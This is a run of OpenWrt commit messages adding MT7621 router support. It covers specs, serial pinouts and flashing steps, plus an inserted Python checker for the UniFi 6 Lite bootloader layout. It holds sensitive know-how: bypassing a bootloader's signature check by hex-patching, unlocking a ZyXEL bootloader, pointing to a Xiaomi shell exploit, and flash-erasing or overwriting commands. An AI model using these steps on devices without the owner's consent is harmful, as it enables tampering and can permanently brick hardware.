Specifications
SoC: MT7621
CPU: 880 MHz
Flash: 16 MiB
RAM: 128 MiB
WLAN: 2.4 GHz b/g/n, 5 GHz a/n/ac
MT7603E / MT7615E
Ethernet: 5x Gbit ports
Installation
There are two known options:
1) The Luci-based UI.
2) Press and hold the reset button during power up.
The router will request 'recovery.bin' from a TFTP server at
192.168.1.88.
Both options require a signed firmware binary.
The OpenWrt image supplied by Cudy is signed and can be used to
install unsigned images.
R4 & R5 need to be shorted (0-100Ω) for the UART to work.
Signed-off-by: Leon M. George <leon@georgemail.eu>
[remove non-required switch-port node - remove trgmii phy-mode]
Signed-off-by: David Bauer <mail@david-bauer.net>
This patch adds support for TP-Link Archer C6U v1 (EU).
The device is also known in some markets as Archer C6 v3.
This patch supports only Archer C6U v1 (EU).
Specifications:
--------------
* SoC: Mediatek MT7621AT 2C2T, 880MHz
* RAM: 128MB DDR3
* Flash: 16MB SPI NOR flash (Winbond 25Q128)
* WiFi 5GHz: Mediatek MT7613BEN (2x2:2)
* WiFi 2.4GHz: Mediatek MT7603EN (2x2:2)
* Ethernet: MT7630, 5x 1000Base-T.
* LED: Power, WAN, LAN, WiFi 2GHz and 5GHz, USB
* Buttons: Reset, WPS.
* UART: Serial console (115200 8n1), J1(GND:3)
* USB: One USB2 port.
Installation:
------------
Install the OpenWrt factory image for C6U from the
TP-Link web interface.
1) Go to "Advanced/System Tools/Firmware Update".
2) Click "Browse" and upload the OpenWrt factory image:
openwrt-ramips-mt7621-tplink_archer-c6u-v1-squashfs-factory.bin.
3) Click the "Upgrade" button, and select "Yes" when prompted.
Recovery to stock firmware:
--------------------------
The C6U bootloader has a failsafe mode that provides a web
interface (running at 192.168.0.1) for reverting back to the
stock TP-Link firmware. The failsafe interface is triggered
from the serial console or on failed kernel boot. Unfortunately,
there's no key combination that enables the failsafe mode. This
gives us two options for recovery:
1) Recover using the serial console (J1 header).
The recovery interface can be selected by hitting 'x' when
prompted on boot.
2) Trigger the bootloader failsafe mode.
A more dangerous option is to force the bootloader into
recovery mode by erasing the OpenWrt partition from
OpenWrt's shell - e.g. "mtd erase firmware". Please be
careful, since erasing the wrong partition can brick
your device.
MAC addresses:
-------------
OEM firmware configuration:
D8:07:B6:xx:xx:83 : 5G
D8:07:B6:xx:xx:84 : LAN (label)
D8:07:B6:xx:xx:84 : 2.4G
D8:07:B6:xx:xx:85 : WAN
Signed-off-by: Georgi Vlaev <georgi.vlaev@konsulko.com>
The patch adds support for the TP-Link Archer A6 v3
The router is sold in US and India with FCC ID TE7A6V3
Specification
-------------
MediaTek MT7621 SOC
RAM: 128MB DDR3
SPI Flash: W25Q128 (16MB)
Ethernet: MT7530 5x 1000Base-T
WiFi 5GHz: Mediatek MT7613BE
WiFi 2.4GHz: Mediatek MT7603E
UART/Serial: 115200 8n1
Device Configuration & Serial Port Pins
---------------------------------------
ETH Ports: LAN4 LAN3 LAN2 LAN1 WAN
_______________________
| |
Serial Pins: | VCC GND TXD RXD |
|_____________________|
LEDs: Power Wifi2G Wifi5G LAN WAN
Build Output
------------
The build will generate the following set of files
[1] openwrt-ramips-mt7621-tplink_archer-a6-v3-initramfs-kernel.bin
[2] openwrt-ramips-mt7621-tplink_archer-a6-v3-squashfs-factory.bin
[3] openwrt-ramips-mt7621-tplink_archer-a6-v3-squashfs-sysupgrade.bin
How to Use - Flashing from TP-Link Web Interface
------------------------------------------------
* Go to "Advanced/System Tools/Firmware Update".
* Click "Browse" and upload the OpenWrt factory image: factory.bin[2]
* Click the "Upgrade" button, and select "Yes" when prompted.
TFTP Booting
------------
Set up a TFTP boot server with address 192.168.0.5.
While starting U-boot press '4' key to stop autoboot.
Copy the initramfs-kernel.bin[1] to TFTP server folder, rename as test.bin
From u-boot command prompt run tftpboot followed by bootm.
Recovery
--------
Archer A6 V3 has recovery page activated if SPI booting from flash fails.
Recovery page can be activated from serial console only.
Press 'x' while u-boot is starting
Note: TFTP boot can be activated only from u-boot serial console.
Device recovery address: 192.168.0.1
Thanks to: Frankis for Random MAC address fix.
Signed-off-by: Vinay Patil <post2vinay@gmail.com>
[remove superfluous factory image definition, whitespacing]
Signed-off-by: David Bauer <mail@david-bauer.net>
The ZyXEL NR7101 is an 802.3at PoE powered 5G outdoor (IP68) CPE
with integrated directional 5G/LTE antennas.
Specifications:
- SoC: MediaTek MT7621AT
- RAM: 256 MB
- Flash: 128 MB NAND (MX30LF1G18AC)
- WiFi: MediaTek MT7603E
- Switch: 1 LAN port (Gigabit)
- 5G/LTE: Quectel RG502Q-EA connected by USB3 to SoC
- SIM: 2 micro-SIM slots under transparent cover
- Buttons: Reset, WLAN under same cover
- LEDs: Multicolour green/red/yellow under same cover (visible)
- Power: 802.3at PoE via LAN port
The device is built as an outdoor ethernet to 5G/LTE bridge or
router. The Wifi interface is intended for installation and/or
temporary management purposes only.
UART Serial:
57600N1
Located on populated 5 pin header J5:
[o] GND
[ ] key - no pin
[o] RX
[o] TX
[o] 3.3V Vcc
Remove the SIM/button/LED cover, the WLAN button and 12 screws
holding the back plate and antenna cover together. The GPS antenna
is fixed to the cover, so be careful with the cable. Remove 4
screws fixing the antenna board to the main board, again being
careful with the cables.
A bluetooth TTL adapter is recommended for permanent console
access, to keep the router water and dustproof. The 3.3V pin is
able to power such an adapter.
MAC addresses:
OpenWrt OEM Address Found as
lan eth2 08:26:97:*:*:BC Factory 0xe000 (hex), label
wlan0 ra0 08:26:97:*:*:BD Factory 0x4 (hex)
wwan0 usb0 random
WARNING!!
ISP managed firmware might at any time update itself to a version
where all known workarounds have been disabled. Never boot an ISP
managed firmware with a SIM in any of the slots if you intend to use
the router with OpenWrt. The bootloader lock can only be disabled with
root access to running firmware. The flash chip is physically
inaccessible without soldering.
Installation from OEM web GUI:
- Log in as "supervisor" on https://172.17.1.1/
- Upload OpenWrt initramfs-recovery.bin image on the
Maintenance -> Firmware page
- Wait for OpenWrt to boot and ssh to root@192.168.1.1
- (optional) Copy OpenWrt to the recovery partition. See below
- Sysupgrade to the OpenWrt sysupgrade image and reboot
Installation from OEM ssh:
- Log in as "root" on 172.17.1.1 port 22022
- scp OpenWrt initramfs-recovery.bin image to 172.17.1.1:/tmp
- Prepare bootloader config by running:
nvram setro uboot DebugFlag 0x1
nvram setro uboot CheckBypass 0
nvram commit
- Run "mtd_write -w write initramfs-recovery.bin Kernel" and reboot
- Wait for OpenWrt to boot and ssh to root@192.168.1.1
- (optional) Copy OpenWrt to the recovery partition. See below
- Sysupgrade to the OpenWrt sysupgrade image and reboot
Copying OpenWrt to the recovery partition:
- Verify that you are running a working OpenWrt recovery image
from flash
- ssh to root@192.168.1.1 and run:
fw_setenv CheckBypass 0
mtd -r erase Kernel2
- Wait while the bootloader mirrors Image1 to Image2
NOTE: This should only be done after successfully booting the OpenWrt
recovery image from the primary partition during installation. Do
not do this after having sysupgraded OpenWrt! Reinstalling the
recovery image on normal upgrades is not required or recommended.
Installation from Z-Loader:
- Halt boot by pressing Escape on console
- Set up a tftp server to serve the OpenWrt initramfs-recovery.bin
image at 10.10.10.3
- Type "ATNR 1,initramfs-recovery.bin" at the "ZLB>" prompt
- Wait for OpenWrt to boot and ssh to root@192.168.1.1
- Sysupgrade to the OpenWrt sysupgrade image
NOTE: ATNR will write the recovery image to both primary and recovery
partitions in one go.
Booting from RAM:
- Halt boot by pressing Escape on console
- Type "ATGU" at the "ZLB>" prompt to enter the U-Boot menu
- Press "4" to select "4: Entr boot command line interface."
- Set up a tftp server to serve the OpenWrt initramfs-recovery.bin
image at 10.10.10.3
- Load it using "tftpboot 0x88000000 initramfs-recovery.bin"
- Boot with "bootm 0x8800017C" to skip the 380 (0x17C) bytes ZyXEL
header
This method can also be used to RAM boot OEM firmware. The warning
regarding OEM applies! Never boot an unknown OEM firmware, or any OEM
firmware with a SIM in any slot.
NOTE: U-Boot configuration is incomplete (on some devices?). You may
have to configure a working mac address before running tftp using
"setenv eth0addr <mac>"
Unlocking the bootloader:
If you are unable to halt boot, then the bootloader is locked.
The OEM firmware locks the bootloader on every boot by setting
DebugFlag to 0. Setting it to 1 is therefore only temporary
when OEM firmware is installed.
- Run "nvram setro uboot DebugFlag 0x1; nvram commit" in OEM firmware
- Run "fw_setenv DebugFlag 0x1" in OpenWrt
NOTE:
OpenWrt does this automatically on first boot if necessary
NOTE2:
Setting the flag to 0x1 avoids the reset to 0 in known OEM
versions, but this might change.
WARNING:
Writing anything to flash while the bootloader is locked is
considered extremely risky. Errors might cause a permanent
brick!
Enabling management access from LAN:
Temporary workaround to allow installing OpenWrt if OEM firmware
has disabled LAN management:
- Connect to console
- Log in as "root"
- Run "iptables -I INPUT -i br0 -j ACCEPT"
Notes on the OEM/bootloader dual partition scheme
The dual partition scheme on this device uses Image2 as a recovery
image only. The device will always boot from Image1, but the
bootloader might copy Image2 to Image1 under specific conditions. This
scheme prevents repurposing of the space occupied by Image2 in any
useful way.
Validation of primary and recovery images is controlled by the
variables CheckBypass, Image1Stable, and Image1Try.
The bootloader sets CheckBypass to 0 and reboots if Image1 fails
validation.
If CheckBypass is 0 and Image1 is invalid then Image2 is copied to
Image1.
If CheckBypass is 0 and Image2 is invalid, then Image1 is copied to
Image2.
If CheckBypass is 1 then all tests are skipped and Image1 is booted
unconditionally. CheckBypass is set to 1 after each successful
validation of Image1.
Image1Try is incremented if Image1Stable is 0, and Image2 is copied to
Image1 if Image1Try is 3 or larger. But the bootloader only tests
Image1Try if CheckBypass is 0, which is impossible unless the booted
image sets it to 0 before failing.
The system is therefore not resilient against runtime errors like
failure to mount the rootfs, unless the kernel image sets CheckBypass
to 0 before failing. This is not yet implemented in OpenWrt.
Setting Image1Stable to 1 prevents the bootloader from updating
Image1Try on every boot, saving unnecessary writes to the environment
partition.
Keeping an OpenWrt initramfs recovery as Image2 is recommended
primarily to avoid unwanted OEM firmware boots on failure. Ref the
warning above. It enables console-less recovery in case of some
failures to boot from Image1.
Signed-off-by: Bjørn Mork <bjorn@mork.no>
So far, board.d files were having execute bit set and contained a
shebang. However, they are just sourced in board_detect, with an
apparently unnecessary check for execute permission beforehand.
Replace this check by one for existence and make the board.d files
"normal" files, as would be expected in /etc anyway.
Note:
This removes an apparently unused '#!/bin/sh /etc/rc.common' in
target/linux/bcm47xx/base-files/etc/board.d/01_network
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
The TP-Link EAP235-Wall is a wall-mounted, PoE-powered AC1200 access
point with four gigabit ethernet ports.
When connecting to the device's serial port, it is strongly advised to
use an isolated UART adapter. This prevents linking different power
domains created by the PoE power supply, which may damage your devices.
The device's U-Boot supports saving modified environments with
`saveenv`. However, there is no u-boot-env partition, and saving
modifications will cause the partition table to be overwritten. This is
not an issue for running OpenWrt, but will prevent the vendor FW from
functioning properly.
Device specifications:
* SoC: MT7621DAT
* RAM: 128MiB
* Flash: 16MiB SPI-NOR
* Wireless 2.4GHz (MT7603EN): b/g/n, 2x2
* Wireless 5GHz (MT7613BEN): a/n/ac, 2x2
* Ethernet: 4× GbE
* Back side: ETH0, PoE PD port
* Bottom side: ETH1, ETH2, ETH3
* Single white device LED
* LED button, reset button (available for failsafe)
* PoE pass-through on port ETH3 (enabled with GPIO)
Datasheet of the flash chip specifies a maximum frequency of 33MHz, but
that didn't work. 20MHz gives no errors with reading (flash dump) or
writing (sysupgrade).
Device mac addresses:
Stock firmware uses the same MAC address for ethernet (on device label)
and 2.4GHz wireless. The 5GHz wireless address is incremented by one.
This address is stored in the 'info' ('default-mac') partition at an
offset of 8 bytes.
From OEM ifconfig:
eth a4:2b:b0:...:88
ra0 a4:2b:b0:...:88
rai0 a4:2b:b0:...:89
Flashing instructions:
* Enable SSH in the web interface, and SSH into the target device
* run `cliclientd stopcs`, this should return "success"
* upload the factory image via the web interface
Debricking:
U-boot can be interrupted during boot, serial console is 57600 baud, 8n1
This allows installing a sysupgrade image, or fixing the device in
another way.
* Access serial header from the side of the board, close to ETH3,
pin-out is (1:TX, 2:RX, 3:GND, 4:3.3V), with pin 1 closest to ETH3.
* Interrupt bootloader by holding '4' during boot, which drops the
bootloader into its shell
* Change default 'serverip' and 'ipaddr' variables (optional)
* Download initramfs with `tftpboot`, and boot image with `bootm`
# tftpboot 84000000 openwrt-initramfs.bin
# bootm
Revert to stock:
Using the tplink-safeloader utility from the firmware-utils package,
TP-Link's firmware image can be converted to an OpenWrt-compatible
sysupgrade image:
$ ./staging_dir/host/bin/tplink-safeloader -B EAP235-WALL-V1 \
-z EAP235-WALLv1_XXX_up_signed.bin -o eap235-sysupgrade.bin
This can then be flashed using the OpenWrt sysupgrade interface. The
image will appear to be incompatible and must be force flashed, without
keeping the current configuration.
Known issues:
- DFS support is incomplete (known issue with MT7613)
- MT7613 radio may stop responding when idling, reboot required.
This was an issue with the ddc75ff704 version of mt76, but appears to
have improved/disappeared with bc3963764d.
Error notice example:
[ 7099.554067] mt7615e 0000:02:00.0: Message 73 (seq 1) timeout
Hardware was kindly provided for porting by Stijn Segers.
Tested-by: Stijn Segers <foss@volatilesystems.org>
Signed-off-by: Sander Vanheule <sander@svanheule.net>
Xiaomi Mi Router 4 is the same as Xiaomi Mi Router 3G, except for
the RAM (256 MiB→128 MiB), LEDs and gpio (MiNet button).
Specifications:
Power: 12 VDC, 1 A
Connector type: barrel
CPU1: MediaTek MT7621A (880 MHz, 4 cores)
FLA1: 128 MiB (ESMT F59L1G81MA)
RAM1: 128 MiB (ESMT M15T1G1664A)
WI1 chip1: MediaTek MT7603EN
WI1 802dot11 protocols: bgn
WI1 MIMO config: 2x2:2
WI1 antenna connector: U.FL
WI2 chip1: MediaTek MT7612EN
WI2 802dot11 protocols: an+ac
WI2 MIMO config: 2x2:2
WI2 antenna connector: U.FL
ETH chip1: MediaTek MT7621A
Switch: MediaTek MT7621A
UART Serial
[o] TX
[o] GND
[o] RX
[ ] VCC - Do not connect it
MAC addresses as verified by OEM firmware:
use address source
LAN *:c2 factory 0xe000 (label)
WAN *:c3 factory 0xe006
2g *:c4 factory 0x0000
5g *:c5 factory 0x8000
Flashing instructions:
1. Create a simple HTTP server (nginx etc.)
2. Set uart enable
To enable writing to the console, you must reset to factory settings
Then you see uboot boot, press the keyboard 4 button (enter uboot command line)
If it is not successful, repeat the above operation of restoring the factory settings.
After entering the uboot command line, type:
setenv uart_en 1
saveenv
boot
3. Use shell in uart
cd /tmp
wget http://"your_computer_ip:80"/openwrt-ramips-mt7621-xiaomi_mir4-squashfs-kernel1.bin
wget http://"your_computer_ip:80"/openwrt-ramips-mt7621-xiaomi_mir4-squashfs-rootfs0.bin
mtd write openwrt-ramips-mt7621-xiaomi_mir4-squashfs-kernel1.bin kernel1
mtd write openwrt-ramips-mt7621-xiaomi_mir4-squashfs-rootfs0.bin rootfs0
nvram set flag_try_sys1_failed=1
nvram commit
reboot
4. Log in to the router at http://192.168.1.1/
Installation via Software exploit
Find the instructions in the https://github.com/acecilia/OpenWRTInvasion
Signed-off-by: Dmytro Oz <sequentiality@gmail.com>
[commit message facelift, rebase onto shared DTSI/common device
definition, bump uboot-envtools]
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
Hardware
--------
MediaTek MT7621AT
256M DDR3
32M SPI-NOR
MediaTek MT7603 2T2R 802.11n 2.4GHz
MediaTek MT7915 2T2R 802.11ax 5GHz
Not Working
-----------
- Bluetooth (connected to UART3)
UART
----
UART is located in the lower left corner of the board. Pinout is
0 - 3V3 (don't connect)
1 - RX
2 - TX
3 - GND
Console is 115200 8N1.
Boot
----
1. Connect to the serial console and connect power.
2. Double-press ESC when prompted
3. Set the fdt address
$ fdt addr $(fdtcontroladdr)
4. Remove the signature node from the control FDT
$ fdt rm /signature
5. Transfer and boot the OpenWrt initramfs image to the device.
Make sure to name the file C0A80114.img and have it reachable at
192.168.1.1/24
$ tftpboot; bootm
Installation
------------
1. Connect to the booted device at 192.168.1.20 using username/password
"ubnt".
2. Update the bootloader environment.
$ fw_setenv devmode TRUE
$ fw_setenv boot_openwrt "fdt addr \$(fdtcontroladdr); fdt rm /signature; bootubnt"
$ fw_setenv bootcmd "run boot_openwrt"
3. Transfer the OpenWrt sysupgrade image to the device using SCP.
4. Check the mtd partition number for bs / kernel0 / kernel1
$ cat /proc/mtd
5. Set the bootselect flag to boot from kernel0
$ dd if=/dev/zero bs=1 count=1 of=/dev/mtdblock4
6. Write the OpenWrt sysupgrade image to both kernel0 as well as kernel1
$ dd if=openwrt.bin of=/dev/mtdblock6
$ dd if=openwrt.bin of=/dev/mtdblock7
7. Reboot the device. It should boot into OpenWrt.
Below are the original installation instructions prior to the discovery
of "devmode=TRUE". They are not required for installation and are
documentation only.
The bootloader employs signature verification on the FIT image
configurations. This way, booting unauthorized image without patching
the bootloader is not possible. Manually configuring the bootcmd in the
U-Boot environment won't work, as this is restored to the default value
if modified.
The bootloader is made up of three different parts.
1. The SPL performing early board initialization and providing a XModem
recovery in case the PBL is missing
2. The PBL being the primary U-Boot application and containing the
control FDT. It is LZMA packed with a uImage header.
3. A Ubiquiti standalone U-Boot application providing the main boot
routine as well as their recovery mechanism.
In a perfect world, we would only replace the PBL, as the SPL does not
perform checks on the PBLs integrity. However, as the PBL is in the same
eraseblock as the SPL, we need to at least rewrite both.
The bootloader will only verify integrity in case it has a "signature"
node in its control device-tree. Renaming the signature node to
something else will prevent this from happening.
Warning: These instructions are based on the firmware initially
shipped with the device and potentially brick your device in a way it
can only be recovered using a SPI flasher.
Only (!) proceed if you understand this!
1. Extract the bootloader from the U-Boot partition using the OpenWrt
initramfs image.
2. Split the bootloader into its 3 components:
$ dd if=bootloader.bin of=spl.bin bs=1 skip=0 count=45056
$ dd if=bootloader.bin of=pbl.uimage bs=1 skip=45056 count=143360
$ dd if=bootloader.bin of=ubnt.uimage bs=1 skip=188416
3. Strip the uImage header from the PBL
$ dd if=pbl.uimage of=pbl.lzma bs=64 skip=1
4. Decompress the PBL
$ lzma -d pbl.lzma --single-stream
The decompressed PBL sha256sum should be
d8b406c65240d260cf15be5f97f40c1d6d1b6e61ec3abed37bb841c90fcc1235
5. Open the decompressed PBL using your favorite hexeditor. Locate the
control FDT at offset 0x4CED0 (0xD00DFEED). At offset 0x4D5BC, the
label for the signature node is located. Rename the "signature"
string at this offset to "signaturr".
The patched PBL sha256sum should be
d028e374cdb40ba44b6e3cef2e4e8a8c16a3b85eb15d9544d24fdd10eed64c97
6. Compress the patched PBL
$ lzma -z pbl --lzma1=dict=67108864
The resulting pbl.lzma file should have the sha256sum
7ae6118928fa0d0b3fe4ff81abd80ecfd9ba2944cb0f0a462b6ae65913088b42
7. Create the PBL uimage
$ SOURCE_DATE_EPOCH=1607909492 mkimage -A mips -O u-boot -C lzma \
  -n "U-Boot 2018.03 [UniFi,v1.1.40.71]" -a 84000000 -e 84000000 \
  -T firmware -d pbl.lzma patched_pbl.uimage
The resulting patched_pbl.uimage should have the sha256sum
b90d7fa2dcc6814180d3943530d8d6b0d6a03636113c94e99af34f196d3cf2ce
8. Reassemble the complete bootloader
$ dd if=patched_pbl.uimage of=aligned_pbl.uimage bs=143360 count=1 \
  conv=sync
$ cat spl.bin > patched_uboot.bin
$ cat aligned_pbl.uimage >> patched_uboot.bin
$ cat ubnt.uimage >> patched_uboot.bin
The resulting patched_uboot.bin should have the sha256sum
3e1186f33b88a525687285c2a8b22e8786787b31d4648b8eee66c672222aa76b
9. Transfer your patched bootloader to the device. Also install the
kmod-mtd-rw package using opkg and load it.
$ insmod mtd-rw.ko i_want_a_brick=1
Write the patched bootloader to mtd0
$ mtd write patched_uboot.bin u-boot
10. Erase the kernel1 partition, as the bootloader might otherwise
decide to boot from there.
$ mtd erase kernel1
11. Transfer the OpenWrt sysupgrade image to the device and install
using sysupgrade.
FIT configurations
------------------
In the future, the MT7621 UniFi6 family can be supported by a single
OpenWrt image.
config@1: U6 Lite
config@2: U6 IW
config@3: U6 Mesh
config@4: U6 Extender
config@5: U6 LR-EA (Early Access - GA is MT7622)
Signed-off-by: David Bauer <mail@david-bauer.net>
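A layout and CRC check that could be run on patched_uboot.bin before step 9 of the commit message above writes it to flash. This is an added example, not part of the original commit or of U-Boot/OpenWrt code: the function names and the sample dump are constructed here, the offsets come from the dd commands in step 2, and the 64-byte header layout is the legacy uImage format.

```python
import struct
import zlib

# Offsets from the dd commands in step 2 of the commit message.
SPL_SIZE = 45056
PBL_SLOT_SIZE = 143360
UBNT_OFFSET = SPL_SIZE + PBL_SLOT_SIZE  # 188416

# Legacy uImage header: 7 big-endian u32, 4 u8, 32-byte name = 64 bytes.
UIMAGE_HDR = struct.Struct(">7I4B32s")
UIMAGE_MAGIC = 0x27051956
IH_COMP_LZMA = 3


def split_bootloader(blob):
    """Split a u-boot partition dump into (spl, pbl_slot, ubnt)."""
    if len(blob) <= UBNT_OFFSET:
        raise ValueError("dump is too short to hold SPL, PBL and the Ubiquiti application")
    return blob[:SPL_SIZE], blob[SPL_SIZE:UBNT_OFFSET], blob[UBNT_OFFSET:]


def check_uimage(slot):
    """Validate the uImage at the start of slot; return (name, payload)."""
    if len(slot) < UIMAGE_HDR.size:
        raise ValueError("slot is smaller than a uImage header")
    (magic, hcrc, _time, size, _load, _ep, dcrc,
     _os, _arch, _type, comp, name) = UIMAGE_HDR.unpack_from(slot)
    if magic != UIMAGE_MAGIC:
        raise ValueError("bad uImage magic")
    header = bytearray(slot[:UIMAGE_HDR.size])
    header[4:8] = b"\x00" * 4  # header CRC is computed with its own field zeroed
    if zlib.crc32(bytes(header)) != hcrc:
        raise ValueError("uImage header CRC mismatch")
    payload = slot[UIMAGE_HDR.size:UIMAGE_HDR.size + size]
    if len(payload) != size:
        raise ValueError("uImage payload does not fit its slot")
    if zlib.crc32(payload) != dcrc:
        raise ValueError("uImage data CRC mismatch")
    if comp != IH_COMP_LZMA:
        raise ValueError("PBL is expected to be LZMA packed")
    return name.rstrip(b"\x00").decode("ascii", "replace"), payload


def reassemble(spl, pbl_uimage, ubnt):
    """Rebuild the partition; NUL padding mirrors dd bs=143360 conv=sync."""
    if len(spl) != SPL_SIZE:
        raise ValueError("SPL must be exactly %d bytes" % SPL_SIZE)
    if len(pbl_uimage) > PBL_SLOT_SIZE:
        raise ValueError("patched PBL no longer fits its slot")
    return spl + pbl_uimage.ljust(PBL_SLOT_SIZE, b"\x00") + ubnt


def verify_before_flash(original, patched):
    """Return the PBL image name if only the PBL slot changed and it is intact."""
    if len(original) != len(patched):
        raise ValueError("patched image length differs from the dump")
    o_spl, o_pbl, o_ubnt = split_bootloader(original)
    p_spl, p_pbl, p_ubnt = split_bootloader(patched)
    if o_spl != p_spl or o_ubnt != p_ubnt:
        raise ValueError("SPL or Ubiquiti application differs from the dump")
    check_uimage(o_pbl)  # the dump itself must parse, or the offsets are wrong
    name, _payload = check_uimage(p_pbl)
    return name


def make_uimage(payload, name=b"constructed PBL"):
    """Build a uImage around payload. Sample data only; the page uses mkimage."""
    # 17 / 5 / 5 = OS u-boot, arch MIPS, type firmware (mkimage -O/-A/-T).
    fields = [UIMAGE_MAGIC, 0, 0, len(payload), 0x84000000, 0x84000000,
              zlib.crc32(payload), 17, 5, 5, IH_COMP_LZMA, name]
    fields[1] = zlib.crc32(UIMAGE_HDR.pack(*fields))
    return UIMAGE_HDR.pack(*fields) + payload


def sample_dump(pbl_payload):
    """Constructed stand-in for a real partition dump (not device data)."""
    return reassemble(b"S" * SPL_SIZE, make_uimage(pbl_payload), b"U" * 4096)


if __name__ == "__main__":
    original = sample_dump(b"constructed-original")
    patched = sample_dump(b"constructed-patched")
    print("ok:", verify_before_flash(original, patched))
    damaged = bytearray(patched)
    damaged[SPL_SIZE + 70] ^= 1  # flip one bit inside the PBL payload
    try:
        verify_before_flash(original, bytes(damaged))
    except ValueError as err:
        print("rejected:", err)
```

The sha256sums listed in the commit message remain the authoritative check for the exact firmware version it describes; this only confirms that the layout and uImage CRCs are self-consistent.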
Specifications:
- SoC: MediaTek MT7621AT
- RAM: 128 MB (DDR3)
- Flash: 16 MB (SPI NOR)
- WiFi: MediaTek MT7615N (x2)
- Switch: 1 WAN, 4 LAN (Gigabit)
- Ports: 1 USB 2.0, 1 USB 3.0
- Buttons: Reset, WiFi Toggle, WPS
- LEDs: Power, Internet, WiFi 2.4G WiFi 5G, USB 2.0, USB 3.0
The R1 revision is identical to the A1 revision except
- No Config2 Partition, therefore
- factory partition resized to 64k from 128K
- Firmware partition offset is 0x50000 not 0x60000
- Firmware partitions size increased by 64K
- Firmware partition type is "denx,uimage", not "sge,uimage"
- Padding of image creation "uimage-padhdr 96" removed
Installation:
- Older firmware versions: put the factory image on a USB stick, turn on
the telnet console, and flash using the following cmd
"fw_updater Linux /mnt/usb_X_X/firmware.bin"
- D-Link FailsafeUI:
Power down the router, press and hold the reset button, then
re-plug it. Keep the reset button pressed until the internet LED stops
flashing, then jack into any lan port and manually assign a static IP
address in 192.168.0.0/24 other than 192.168.0.0 (e.g. 192.168.0.2)
and go to http://192.168.0.1
Flash with the factory image.
Signed-off-by: Andrew Pikler <andrew.pikler@gmail.com>
The GL-MT1300 is a high-performance new generation pocket-sized router
that offers a powerful hardware and first-class cybersecurity protocol
with unique and modern design.
Specifications:
- SoC: MT7621A, Dual-Core @880MHz
- RAM: 256 MB DDR3
- Flash: 32 MB
- Ethernet: 3 x 10/100/1000: 2 x LAN + 1 x WAN
- Wireless: 1 x MT7615D Dual-Band 2.4GHz(400Mbps) + 5GHz(867Mbps)
- USB: 1 x USB 3.0 port
- Slot: 1 x MicroSD card slot
- Button: 1 x Reset button
- Switch: 1 x Mode switch
- LED: 1 x Blue LED + 1 x White LED
MAC addresses based on vendor firmware:
WAN : factory 0x4000
LAN : MAC from factory 0x4000 + 1
2.4GHz : factory 0x4
5GHz : MAC from factory 0x4 + 1
Flashing instructions:
1. Connect to one of LAN ports.
2. Set the static IP on the PC to 192.168.1.2.
3. Press the Reset button and power the device (do not release the button).
After waiting for the blue led to flash 5 times, the white led will
come on and release the button.
4. Browse the 192.168.1.1 web page and update firmware according to web
tips.
5. The blue led will flash when the firmware is being upgraded.
6. The blue led stops blinking to indicate that the firmware upgrade is
complete and U-Boot automatically starts the firmware.
For more information on GL-MT1300, see the OFFICIAL GL.iNet website:
https://www.gl-inet.com/products/gl-mt1300/
Signed-off-by: Xinfa Deng <xinfa.deng@gl-inet.com>
[add input-type for switch, wrap long line in 10_fix_wifi_mac]
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
This aligns the device/image names of the older Xiaomi Mi Router
devices with their "friendly" model and DEVICE_MODEL properties.
This also reintroduces consistency with the newer devices already
following that scheme.
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
Specifications:
SoC: MediaTek MT7621ST (880 MHz)
FLASH: 16 MiB (Macronix MX25L12835FM2I-10G)
RAM: 128 MiB (Nanya NT5CB64M16FP-DH)
WiFi: MediaTek MT7603EN bgn 2x2:2
WiFi: MediaTek MT7612EN an 2x2:2
BTN: Reset, WPS
LED: - Power
- WiFi 2.4 GHz
- WiFi 5 GHz
- WAN
- LAN {1-4}
- USB {1-2}
UART: UART is present as pin hole next to the aluminium capacitor.
3V3 - RX - GND - TX / 115200-8N1
3V3 is the nearest on the aluminium capacitor and nut hole (pin1).
USB: 2 ports
POWER: 12VDC, 1.5A (Barrel 5.5x2.1)
Installation:
Via TFTP:
Set your computer's IP address to 192.168.1.75
Power up the Router with the Reset button pressed.
Release the Reset button after 5 seconds.
Upload OpenWRT sysupgrade image via TFTP:
tftp -4 -v -m binary 192.168.1.1 -c put IMAGE
MAC addresses:
0x4 *:98 2g/wan, label
0x22 *:9c
0x28 *:98
0x8004 *:9c 5g/lan
Though addresses are written to 0x22 and 0x28, it appears that the
vendor firmware actually only uses 0x4 and 0x8004. Thus, we do the
same here.
Signed-off-by: Pavel Chervontsev <cherpash@gmail.com>
[add MAC address overview, add label-mac-device, fix IMAGE_SIZE]
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
This device has previously been supported by the image
for Xiaomi Mi Router 3G v2. Since this is not obvious, the
4A is marketed as a new major revision and it also seems to
have a different bootloader, this will be both more tidy and
more helpful for the users.
Apart from that, note that there also is a 100M version of
the device that uses mt7628 platform, so a specifically named
image will also prevent confusion in this area.
Specifications:
- SoC: MediaTek MT7621
- Flash: 16 MiB NOR SPI
- RAM: 128 MiB DDR3
- Ethernet: 3x 10/100/1000 Mbps (switched, 2xLAN + WAN)
- WIFI0: MT7603E 2.4GHz 802.11b/g/n
- WIFI1: MT7612E 5GHz 802.11ac
- Antennas: 4x external (2 per radio), non-detachable
- LEDs: Programmable "power" LED (two-coloured, yellow/blue)
Non-programmable "internet" LED (shows WAN activity)
- Buttons: Reset
Installation:
Bootloader won't accept any serial input unless "boot_wait" u-boot
environment variable is changed to "on".
Vendor firmware won't accept any serial input until "uart_en" is
set to "1".
Using the https://github.com/acecilia/OpenWRTInvasion exploit you
can gain access to shell to enable these options:
To enable uart keyboard actions - 'nvram set uart_en=1'
To make uboot delay boot work - 'nvram set boot_wait=on'
Set boot delay to 5 - 'nvram set bootdelay=5'
Then run 'nvram commit' to make the changes permanent.
Once in the shell (following the OpenWRTInvasion instructions) you
can then run the following to flash OpenWrt and then reboot:
'cd /tmp; curl https://downloads.openwrt.org/...-sysupgrade.bin
--output firmware.bin; mtd -e OS1 -r write firmware.bin OS1'
Suggested-by: David Bentham <db260179@gmail.com>
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
This patch adds support for D-Link DIR-2640 A1.
Specifications:
* Board: AP-MTKH7-0002
* SoC: MediaTek MT7621AT
* RAM: 256 MB (DDR3)
* Flash: 128 MB (NAND)
* WiFi: MediaTek MT7615N (x2)
